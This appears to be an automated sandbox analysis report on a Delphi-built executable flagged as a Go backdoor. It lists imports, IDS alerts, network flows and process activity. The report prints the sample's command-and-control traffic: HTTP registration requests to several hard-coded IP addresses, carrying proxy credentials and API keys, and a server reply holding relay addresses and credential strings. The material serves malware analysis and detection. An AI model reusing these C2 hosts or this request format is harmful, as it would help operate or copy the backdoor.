                                                  kernel32.dllSetFileAttributesW, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetSystemTime, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToTzSpecificLocalTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, CreateProcessW, HeapSize, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, GlobalFree, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, UnmapViewOfFile, GlobalHandle, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, EnumResourceNamesW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, CreatePipe, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, RemoveDirectoryW, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                  SHFolder.dllSHGetFolderPathW
                                                  ole32.dllIsEqualGUID, OleInitialize, CreateStreamOnHGlobal, CLSIDFromProgID, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
                                                  gdi32.dllPie, EnumEnhMetaFile, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, CreateDCW, PolyBezierTo, CreateICW, GetStockObject, GetCharABCWidthsW, CreateSolidBrush, GetBkMode, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, SetTextCharacterExtra, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, SetMapMode, GetMapMode, CreateFontIndirectW, PolyBezier, ExtCreatePen, EndDoc, GetObjectW, GetFontData, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, CreateEnhMetaFileW, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, GetTextMetricsA, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, GetCharABCWidthsA, Rectangle, SaveDC, DeleteDC, BitBlt, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, SetWinMetaFileBits, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, SetStretchBltMode, GetDIBits, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetObjectA, GetBrushOrgEx, GetCurrentPositionEx, SetDCPenColor, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, GetPolyFillMode, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries
                                                  NameOrdinalAddress
                                                  TMethodImplementationIntercept30x4e0e90
                                                  __dbk_fcall_wrapper20x411be8
                                                  dbkFCallWrapperAddr10x989640
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-25T08:32:51.454857+01002855478ETPRO MALWARE Unknown Golang Backdoor Activity1192.168.2.44974546.8.232.10630001TCP
                                                  2024-11-25T08:32:53.161229+01002855478ETPRO MALWARE Unknown Golang Backdoor Activity1192.168.2.44974646.8.236.6130001TCP
                                                  2024-11-25T08:32:54.707596+01002855478ETPRO MALWARE Unknown Golang Backdoor Activity1192.168.2.44974791.212.166.9130001TCP
                                                  2024-11-25T08:32:56.462874+01002855478ETPRO MALWARE Unknown Golang Backdoor Activity1192.168.2.449749188.130.206.24330001TCP
                                                  2024-11-25T08:32:58.717750+01002855478ETPRO MALWARE Unknown Golang Backdoor Activity1192.168.2.44975038.180.205.16430001TCP
                                                  2024-11-25T08:33:00.211444+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21109.172.88.3814206192.168.2.449751TCP
                                                  2024-11-25T08:33:00.211852+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.449751109.172.88.3814206TCP
                                                  2024-11-25T08:33:28.896467+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.449751109.172.88.3814206TCP
                                                  2024-11-25T08:33:29.364597+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11109.172.88.3814206192.168.2.449751TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 25, 2024 08:32:49.942781925 CET4974530001192.168.2.446.8.232.106
                                                  Nov 25, 2024 08:32:50.062540054 CET300014974546.8.232.106192.168.2.4
                                                  Nov 25, 2024 08:32:50.062628031 CET4974530001192.168.2.446.8.232.106
                                                  Nov 25, 2024 08:32:50.063577890 CET4974530001192.168.2.446.8.232.106
                                                  Nov 25, 2024 08:32:50.187004089 CET300014974546.8.232.106192.168.2.4
                                                  Nov 25, 2024 08:32:51.401817083 CET300014974546.8.232.106192.168.2.4
                                                  Nov 25, 2024 08:32:51.454857111 CET4974530001192.168.2.446.8.232.106
                                                  Nov 25, 2024 08:32:51.679410934 CET4974630001192.168.2.446.8.236.61
                                                  Nov 25, 2024 08:32:51.800962925 CET300014974646.8.236.61192.168.2.4
                                                  Nov 25, 2024 08:32:51.801028013 CET4974630001192.168.2.446.8.236.61
                                                  Nov 25, 2024 08:32:51.801287889 CET4974630001192.168.2.446.8.236.61
                                                  Nov 25, 2024 08:32:51.920890093 CET300014974646.8.236.61192.168.2.4
                                                  Nov 25, 2024 08:32:53.093496084 CET300014974646.8.236.61192.168.2.4
                                                  Nov 25, 2024 08:32:53.143989086 CET4974730001192.168.2.491.212.166.91
                                                  Nov 25, 2024 08:32:53.161228895 CET4974630001192.168.2.446.8.236.61
                                                  Nov 25, 2024 08:32:53.263598919 CET300014974791.212.166.91192.168.2.4
                                                  Nov 25, 2024 08:32:53.263679028 CET4974730001192.168.2.491.212.166.91
                                                  Nov 25, 2024 08:32:53.265106916 CET4974730001192.168.2.491.212.166.91
                                                  Nov 25, 2024 08:32:53.384608984 CET300014974791.212.166.91192.168.2.4
                                                  Nov 25, 2024 08:32:54.650826931 CET300014974791.212.166.91192.168.2.4
                                                  Nov 25, 2024 08:32:54.707596064 CET4974730001192.168.2.491.212.166.91
                                                  Nov 25, 2024 08:32:54.719232082 CET4974930001192.168.2.4188.130.206.243
                                                  Nov 25, 2024 08:32:54.838892937 CET3000149749188.130.206.243192.168.2.4
                                                  Nov 25, 2024 08:32:54.839052916 CET4974930001192.168.2.4188.130.206.243
                                                  Nov 25, 2024 08:32:54.839297056 CET4974930001192.168.2.4188.130.206.243
                                                  Nov 25, 2024 08:32:55.221343994 CET3000149749188.130.206.243192.168.2.4
                                                  Nov 25, 2024 08:32:56.394202948 CET3000149749188.130.206.243192.168.2.4
                                                  Nov 25, 2024 08:32:56.446940899 CET4975030001192.168.2.438.180.205.164
                                                  Nov 25, 2024 08:32:56.462873936 CET4974930001192.168.2.4188.130.206.243
                                                  Nov 25, 2024 08:32:56.566566944 CET300014975038.180.205.164192.168.2.4
                                                  Nov 25, 2024 08:32:56.570700884 CET4975030001192.168.2.438.180.205.164
                                                  Nov 25, 2024 08:32:56.570919037 CET4975030001192.168.2.438.180.205.164
                                                  Nov 25, 2024 08:32:56.690392971 CET300014975038.180.205.164192.168.2.4
                                                  Nov 25, 2024 08:32:58.676878929 CET300014975038.180.205.164192.168.2.4
                                                  Nov 25, 2024 08:32:58.686845064 CET4974930001192.168.2.4188.130.206.243
                                                  Nov 25, 2024 08:32:58.686897993 CET4974730001192.168.2.491.212.166.91
                                                  Nov 25, 2024 08:32:58.686923981 CET4974630001192.168.2.446.8.236.61
                                                  Nov 25, 2024 08:32:58.686954021 CET4974530001192.168.2.446.8.232.106
                                                  Nov 25, 2024 08:32:58.717750072 CET4975030001192.168.2.438.180.205.164
                                                  Nov 25, 2024 08:32:58.754837990 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:32:58.807512999 CET3000149749188.130.206.243192.168.2.4
                                                  Nov 25, 2024 08:32:58.807558060 CET300014974791.212.166.91192.168.2.4
                                                  Nov 25, 2024 08:32:58.807593107 CET4974930001192.168.2.4188.130.206.243
                                                  Nov 25, 2024 08:32:58.807615995 CET4974730001192.168.2.491.212.166.91
                                                  Nov 25, 2024 08:32:58.807672024 CET300014974646.8.236.61192.168.2.4
                                                  Nov 25, 2024 08:32:58.807702065 CET300014974546.8.232.106192.168.2.4
                                                  Nov 25, 2024 08:32:58.807719946 CET4974630001192.168.2.446.8.236.61
                                                  Nov 25, 2024 08:32:58.807744026 CET4974530001192.168.2.446.8.232.106
                                                  Nov 25, 2024 08:32:58.874341011 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:32:58.874432087 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:00.211443901 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:00.211852074 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:00.331371069 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:15.337438107 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:15.456964970 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:20.079544067 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:20.083039045 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:20.202866077 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:28.677479982 CET4975030001192.168.2.438.180.205.164
                                                  Nov 25, 2024 08:33:28.796931028 CET300014975038.180.205.164192.168.2.4
                                                  Nov 25, 2024 08:33:28.896466970 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:29.015911102 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:29.364597082 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:29.412275076 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:40.534540892 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:40.534809113 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:40.654263973 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:55.660409927 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:55.779942036 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:58.801058054 CET4975030001192.168.2.438.180.205.164
                                                  Nov 25, 2024 08:33:58.920521021 CET300014975038.180.205.164192.168.2.4
                                                  Nov 25, 2024 08:33:59.363662004 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:33:59.483140945 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:59.822377920 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:33:59.869976044 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:34:00.986527920 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:34:00.986674070 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:34:01.106168032 CET1420649751109.172.88.38192.168.2.4
                                                  Nov 25, 2024 08:34:16.113090992 CET4975114206192.168.2.4109.172.88.38
                                                  Nov 25, 2024 08:34:16.232552052 CET1420649751109.172.88.38192.168.2.4
                                                  • 46.8.232.106:30001
                                                  • 46.8.236.61:30001
                                                  • 91.212.166.91:30001
                                                  • 188.130.206.243:30001
                                                  • 38.180.205.164:30001
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44974546.8.232.106300016620C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 08:32:50.063577890 CET290OUTGET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1
                                                  Host: 46.8.232.106:30001
                                                  User-Agent: Go-http-client/1.1
                                                  X-Api-Key: PXbyn4MO
                                                  Accept-Encoding: gzip
                                                  Nov 25, 2024 08:32:51.401817083 CET183INHTTP/1.1 429 Too Many Requests
                                                  Content-Type: text/plain; charset=utf-8
                                                  X-Content-Type-Options: nosniff
                                                  Date: Mon, 25 Nov 2024 07:32:51 GMT
                                                  Content-Length: 18
                                                  Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                  Data Ascii: Too many requests


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.44974646.8.236.61300016620C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 08:32:51.801287889 CET289OUTGET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1
                                                  Host: 46.8.236.61:30001
                                                  User-Agent: Go-http-client/1.1
                                                  X-Api-Key: OJZULM0Y
                                                  Accept-Encoding: gzip
                                                  Nov 25, 2024 08:32:53.093496084 CET183INHTTP/1.1 429 Too Many Requests
                                                  Content-Type: text/plain; charset=utf-8
                                                  X-Content-Type-Options: nosniff
                                                  Date: Mon, 25 Nov 2024 07:32:52 GMT
                                                  Content-Length: 18
                                                  Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                  Data Ascii: Too many requests


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.44974791.212.166.91300016620C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 08:32:53.265106916 CET291OUTGET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1
                                                  Host: 91.212.166.91:30001
                                                  User-Agent: Go-http-client/1.1
                                                  X-Api-Key: MeQHYhig
                                                  Accept-Encoding: gzip
                                                  Nov 25, 2024 08:32:54.650826931 CET183INHTTP/1.1 429 Too Many Requests
                                                  Content-Type: text/plain; charset=utf-8
                                                  X-Content-Type-Options: nosniff
                                                  Date: Mon, 25 Nov 2024 07:32:54 GMT
                                                  Content-Length: 18
                                                  Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                  Data Ascii: Too many requests


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449749188.130.206.243300016620C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 08:32:54.839297056 CET293OUTGET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1
                                                  Host: 188.130.206.243:30001
                                                  User-Agent: Go-http-client/1.1
                                                  X-Api-Key: sNxZLFOr
                                                  Accept-Encoding: gzip
                                                  Nov 25, 2024 08:32:56.394202948 CET183INHTTP/1.1 429 Too Many Requests
                                                  Content-Type: text/plain; charset=utf-8
                                                  X-Content-Type-Options: nosniff
                                                  Date: Mon, 25 Nov 2024 07:32:56 GMT
                                                  Content-Length: 18
                                                  Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                  Data Ascii: Too many requests


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.44975038.180.205.164300016620C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 08:32:56.570919037 CET292OUTGET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1
                                                  Host: 38.180.205.164:30001
                                                  User-Agent: Go-http-client/1.1
                                                  X-Api-Key: jE9jRK0i
                                                  Accept-Encoding: gzip
                                                  Nov 25, 2024 08:32:58.676878929 CET1195INHTTP/1.1 200 OK
                                                  Date: Mon, 25 Nov 2024 07:32:58 GMT
                                                  Content-Length: 1076
                                                  Content-Type: text/plain; charset=utf-8
                                                  Data Raw: 31 30 39 2e 31 37 32 2e 38 38 2e 33 38 3b 31 34 32 30 36 3b 68 52 7a 31 74 4d 43 66 74 41 34 41 70 48 65 38 3a 57 73 43 2f 37 41 4b 2f 75 32 4b 34 62 34 6b 36 6c 4b 47 2e 73 69 49 38 46 6c 76 2e 68 59 49 32 5a 34 42 33 4e 71 33 32 5a 51 30 2e 30 55 76 31 46 70 76 30 51 69 50 36 53 74 6c 3a 6d 67 64 33 68 56 4a 30 34 35 6a 30 56 36 56 30 55 36 54 31 50 4e 7a 2f 6d 6b 64 61 38 61 67 70 58 6a 64 69 47 55 70 2f 44 35 48 68 67 79 50 65 43 47 73 6c 4c 33 39 70 58 4c 61 65 46 5a 71 72 58 55 61 2d 73 4f 6e 66 45 75 6d 69 63 74 74 72 42 58 43 73 78 62 5a 74 70 76 63 2d 42 70 67 72 6e 75 39 65 65 42 38 67 44 32 30 69 30 48 47 73 5a 35 41 74 41 78 48 65 64 6f 65 72 54 72 56 2c 75 57 6a 68 4a 53 68 74 56 56 65 74 44 77 56 70 53 6f 6e 3a 50 39 75 2f 65 52 6b 2f 75 53 6c 34 75 7a 47 36 49 4d 5a 2e 57 64 6d 38 79 7a 38 2e 5a 46 69 32 6c 79 31 33 37 64 61 36 79 67 6d 2e 31 30 72 36 31 46 4c 31 77 79 44 3a 35 32 42 33 74 65 49 30 48 45 49 30 6d 4e 49 30 5a 78 6d 31 63 50 75 2f 72 33 72 61 33 64 38 70 6e 72 74 69 34 [TRUNCATED]
                                                  Data Ascii: 109.172.88.38;14206;hRz1tMCftA4ApHe8:WsC/7AK/u2K4b4k6lKG.siI8Flv.hYI2Z4B3Nq32ZQ0.0Uv1Fpv0QiP6Stl:mgd3hVJ045j0V6V0U6T1PNz/mkda8agpXjdiGUp/D5HhgyPeCGslL39pXLaeFZqrXUa-sOnfEumicttrBXCsxbZtpvc-Bpgrnu9eeB8gD20i0HGsZ5AtAxHedoerTrV,uWjhJShtVVetDwVpSon:P9u/eRk/uSl4uzG6IMZ.Wdm8yz8.ZFi2ly137da6ygm.10r61FL1wyD:52B3teI0HEI0mNI0Zxm1cPu/r3ra3d8pnrti4pI/nOuh7TUeL7YlP9apkqze5k6rraw-nGyfh1iiDQPrilss5NCtUMT-k8lr9f9eUl8gaQRiLAGsY4stBsxeeW0rX8p,dwohwFAtKPHtFrRpvqt:49o/fmv/u8s9fAo1WZJ.99a2SoN1DwZ25rr.Tmc1Ood6lht6RV7.zvI9kRj105Y:i823JwR03aF0qU50pUf18gY/fv1a0wHpG1wiUsS/3D0hOnEetlPl63dpR7LeffOrtQA-FoNfBS3iZigrGgyslMCtqmd-lxLrT8ieUV2gXcmirkasSE5tzBpeaVBrnfi,Dj1hqH1tJ4XtsMqpNsk:z0K/oHU/Fw21RVB8efG8Sle.hxl1u5p3cve0lmW.F162rs70hFT6tcv.0Y32i414w3F3iCr:ZPe3ZMS01tE0VEZ0MOc1zL5/JeqaS6Bp9P1iluh/fFdhfmKelEwl6jepTHjerJxrTzU-evpfyPMihXprrqrsEDhtTaD-gSNrOZGeXWKgywLi33gs41Rt4RzenZgrSyR,e28hXwrtMLMtLrYp7lr:PkW/9Ci/kJs3tcQ8Vl3.q0D1VW48jGc0Pq4.R0j2Zn40ev65tJe.JZQ1xfW6s7m42Ig:fWM3gHO0Q3f0aEC0DfX1K4R/entaLdfprl5iFhd/6VVhWgfeMAXl7NFprH1evOP [TRUNCATED]


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:02:32:09
                                                  Start date:25/11/2024
                                                  Path:C:\Users\user\Desktop\iKhdG3bwZK.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\iKhdG3bwZK.exe"
                                                  Imagebase:0x400000
                                                  File size:21'120'968 bytes
                                                  MD5 hash:044037796CF2D13EADF0217833D52E65
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:02:32:14
                                                  Start date:25/11/2024
                                                  Path:C:\Windows\SysWOW64\more.com
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\more.com
                                                  Imagebase:0x110000
                                                  File size:24'576 bytes
                                                  MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:02:32:14
                                                  Start date:25/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:02:32:41
                                                  Start date:25/11/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                  Imagebase:0x350000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:02:32:50
                                                  Start date:25/11/2024
                                                  Path:C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe"
                                                  Imagebase:0x400000
                                                  File size:21'120'968 bytes
                                                  MD5 hash:044037796CF2D13EADF0217833D52E65
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:29.2%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:5.4%
                                                    Total number of Nodes:147
                                                    Total number of Limit Nodes:7
                                                    execution_graph 1889 709901 1890 70993c 1889->1890 1892 709943 1889->1892 1891 70af42 GlobalAlloc 1891->1892 1892->1890 1892->1891 1728 70c322 1731 70b6c2 1728->1731 1732 70b72b 1731->1732 1788 70a672 1732->1788 1734 70b760 1735 70a672 GetPEB 1734->1735 1736 70b777 1735->1736 1791 70af42 1736->1791 1738 70b9ef 1794 70a192 1738->1794 1740 70ba0c 1797 70a4b2 1740->1797 1742 70ba29 1743 70af42 GlobalAlloc 1742->1743 1744 70bb31 1743->1744 1801 70a122 1744->1801 1746 70bb4e 1747 70a4b2 2 API calls 1746->1747 1748 70bb61 1747->1748 1804 70afa2 1748->1804 1750 70bbd9 1811 70a212 1750->1811 1752 70bcb5 1814 70a882 CreateFileW 1752->1814 1754 70bcd7 1820 70b1a2 1754->1820 1756 70bd17 1757 70bdd1 1756->1757 1758 70be25 1756->1758 1824 70b352 1757->1824 1760 70be5d 1758->1760 1761 70be2d 1758->1761 1764 70af42 GlobalAlloc 1760->1764 1830 70a322 1761->1830 1762 70be1d 1767 70c0ed 1762->1767 1768 70c13c 1762->1768 1853 709b12 1762->1853 1766 70be6a 1764->1766 1769 70af42 GlobalAlloc 1766->1769 1768->1767 1771 70af42 GlobalAlloc 1768->1771 1770 70bee8 1769->1770 1834 70a262 1770->1834 1773 70c1e9 1771->1773 1775 70a4b2 2 API calls 1773->1775 1774 70bf3a 1777 70af42 GlobalAlloc 1774->1777 1780 70c052 1774->1780 1776 70c220 1775->1776 1779 70af42 GlobalAlloc 1776->1779 1786 70bf95 1777->1786 1781 70c25d 1779->1781 1780->1762 1849 709912 1780->1849 1782 70c27a VirtualProtect 1781->1782 1828 70a832 1782->1828 1786->1780 1839 709c62 1786->1839 1842 70b482 1786->1842 1856 70b672 GetPEB 1788->1856 1790 70a692 1790->1734 1792 70af52 1791->1792 1793 70af5e GlobalAlloc 1791->1793 1792->1793 1793->1738 1795 70af42 GlobalAlloc 1794->1795 1796 70a1a1 1795->1796 1796->1740 1798 70af42 GlobalAlloc 1797->1798 1799 70a4c3 1798->1799 1800 70a4d6 LoadLibraryW 1799->1800 1800->1742 1802 70af42 GlobalAlloc 1801->1802 1803 70a131 1802->1803 1803->1746 1806 70afb7 1804->1806 1805 70af42 GlobalAlloc 1805->1806 1806->1805 1807 70afef NtQuerySystemInformation 1806->1807 1810 70afdd 1806->1810 1807->1806 1808 70b01b 1807->1808 1809 70af42 GlobalAlloc 1808->1809 1809->1810 1810->1750 1812 70af42 GlobalAlloc 1811->1812 1813 70a220 1812->1813 1813->1752 1815 70a8b6 1814->1815 1816 70a8af 1814->1816 1815->1816 1817 70af42 GlobalAlloc 1815->1817 1816->1754 1818 70a8f2 ReadFile 1817->1818 1818->1816 1819 70a92d CloseHandle 1818->1819 1819->1816 1821 70b1b3 1820->1821 1822 70a4b2 2 API calls 1821->1822 1823 70b288 1822->1823 1823->1756 1825 70b375 1824->1825 1826 70b40a 1825->1826 1827 70b482 4 API calls 1825->1827 1826->1762 1827->1825 1829 70a83e VirtualProtect 1828->1829 1829->1767 1832 70a345 1830->1832 1831 70a393 1831->1762 1832->1831 1833 709912 GlobalAlloc 1832->1833 1833->1832 1835 70af42 GlobalAlloc 1834->1835 1836 70a273 1835->1836 1837 70af42 GlobalAlloc 1836->1837 1838 70a295 1837->1838 1838->1774 1857 709eb2 1839->1857 1841 709ca7 1841->1786 1843 70a262 GlobalAlloc 1842->1843 1844 70b491 1843->1844 1863 70ae72 CreateFileW 1844->1863 1848 70b4b6 1848->1786 1850 70993c 1849->1850 1852 709943 1849->1852 1850->1762 1851 70af42 GlobalAlloc 1851->1852 1852->1850 1852->1851 1854 70af42 GlobalAlloc 1853->1854 1855 709b25 1854->1855 1855->1768 1856->1790 1858 709ec1 1857->1858 1859 